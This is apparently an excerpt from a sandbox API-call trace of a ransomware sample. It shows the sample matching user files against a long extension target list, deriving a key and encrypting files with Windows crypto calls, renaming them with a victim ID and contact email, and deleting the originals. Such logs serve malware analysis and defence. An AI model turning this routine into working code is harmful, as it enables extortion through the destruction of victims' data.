hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".csv") returned=".csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.639] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.640] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.640] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.657] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1343d, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x1343d, lpOverlapped=0x0) returned 1
	[0189.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.662] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb2a8) returned 1
	[0189.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.664] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.664] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.664] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9570) returned 1
	[0189.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.664] CryptEncrypt (in: hKey=0xfb9570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x1343d, dwBufLen=0x1343d | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x13440) returned 1
	[0189.667] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.667] RtlMoveMemory (in: Destination=0xff05c8, Source=0xfdd180, Length=0x1343d | out: Destination=0xff05c8) 
	[0189.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.667] CryptEncrypt (in: hKey=0xfb9570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff05c8*, pdwDataLen=0x18a1ec*=0x1343d, dwBufLen=0x13440 | out: pbData=0xff05c8*, pdwDataLen=0x18a1ec*=0x13440) returned 1
	[0189.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.669] CryptDestroyKey (hKey=0xfb9570) returned 1
	[0189.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.669] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0189.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.669] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0189.670] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.670] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.670] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.671] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 131
	[0189.671] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.672] WriteFile (in: hFile=0x390, lpBuffer=0xff05c8*, nNumberOfBytesToWrite=0x13440, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff05c8*, lpNumberOfBytesWritten=0x18a648*=0x13440, lpOverlapped=0x0) returned 1
	[0189.678] CloseHandle (hObject=0x390) returned 1
	[0189.679] CloseHandle (hObject=0x388) returned 1
	[0189.679] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv")) returned 1
	[0189.686] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv")) returned 0
	[0189.686] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a634bd0, ftCreationTime.dwHighDateTime=0x1d97497, ftLastAccessTime.dwLowDateTime=0x7dd31d00, ftLastAccessTime.dwHighDateTime=0x1d97519, ftLastWriteTime.dwLowDateTime=0x7dd31d00, ftLastWriteTime.dwHighDateTime=0x1d97519, nFileSizeHigh=0x0, nFileSizeLow=0x10fda, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZZM5X5JXuESk93xmmp.rtf", cAlternateFileName="ZZM5X5~1.RTF")) returned 1
	[0189.687] lstrcmpW (lpString1="ZZM5X5JXuESk93xmmp.rtf", lpString2="..") returned 1
	[0189.687] lstrcmpW (lpString1="ZZM5X5JXuESk93xmmp.rtf", lpString2=".") returned 1
	[0189.687] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.687] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="ZZM5X5JXuESk93xmmp.rtf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\ZZM5X5JXuESk93xmmp.rtf") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\ZZM5X5JXuESk93xmmp.rtf"
	[0189.687] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\ZZM5X5JXuESk93xmmp.rtf") returned 94
	[0189.687] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.687] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\ZZM5X5JXuESk93xmmp.rtf", cchLength=0x5e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf") returned 0x5e
	[0189.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.688] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf"
	[0189.688] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\zzm5x5jxuesk93xmmp.rtf") returned 94
	[0189.688] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.688] StrStrW (lpFirst=".rtf", lpSrch=".") returned=".rtf"
	[0189.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.689] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rtf") returned=".rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm